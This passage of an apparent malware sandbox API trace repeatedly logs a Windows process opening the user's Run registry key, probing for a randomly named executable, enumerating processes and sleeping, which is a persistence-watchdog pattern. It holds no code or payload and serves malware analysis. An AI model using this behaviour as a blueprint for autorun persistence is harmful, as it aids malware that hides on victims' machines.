0x0 [0249.697] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0249.697] NtClose (Handle=0x14c) returned 0x0 [0249.697] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.697] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.698] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.698] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.698] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.698] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0249.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0249.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0249.808] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0249.824] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0249.824] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0249.824] NtClose (Handle=0x14c) returned 0x0 [0249.824] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.824] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.824] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.824] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.824] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.824] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0249.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0249.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0249.907] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0249.915] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0249.915] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0249.915] NtClose (Handle=0x14c) returned 0x0 [0249.915] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.916] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.916] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.916] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0249.916] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0249.916] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0249.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0249.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0249.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0250.000] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0250.009] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0250.009] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0250.009] NtClose (Handle=0x14c) returned 0x0 [0250.009] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.009] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.009] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.009] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.010] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.010] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0250.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0250.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0250.095] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0250.104] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0250.104] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0250.104] NtClose (Handle=0x14c) returned 0x0 [0250.104] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.104] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.104] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.104] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.104] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.104] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0250.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0250.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0250.203] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0250.212] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0250.212] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0250.212] NtClose (Handle=0x14c) returned 0x0 [0250.212] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.212] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.212] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.212] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.213] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.213] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0250.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0250.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0250.310] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0250.346] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0250.346] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0250.346] NtClose (Handle=0x14c) returned 0x0 [0250.346] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.346] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.346] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.347] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.347] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.347] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x2e0000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0250.347] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e0000, ResultLength=0x0) returned 0x0 [0250.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x2e0000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0250.676] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0250.680] NtCreateKey (in: KeyHandle=0x19ea74, DesiredAccess=0x20219, ObjectAttributes=0x19e1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x19ea74*=0x14c) returned 0x0 [0250.680] NtEnumerateValueKey (in: KeyHandle=0x14c, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x19e438, Length=0x200, ResultLength=0x19e838 | out: KeyValueInformation=0x19e438, ResultLength=0x19e838) returned 0x0 [0250.680] NtClose (Handle=0x14c) returned 0x0 [0250.680] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19e820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.680] NtCreateFile (in: FileHandle=0x19e840, DesiredAccess=0x120089, ObjectAttributes=0x19e808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19e828, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19e840*=0x0, IoStatusBlock=0x19e828*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.680] RtlFreeHeap (HeapHandle=0x400000, Flags=0x0, BaseAddress=0x45c4b8) returned 1 [0250.680] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtPathName=0x19ea3c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0250.680] NtCreateFile (in: FileHandle=0x19ea5c, DesiredAccess=0x120089, ObjectAttributes=0x19ea24*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Gjptlgbx0\\regsvc1bg8pj9.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ea44, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ea5c*=0x0, IoStatusBlock=0x19ea44*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0250.681] 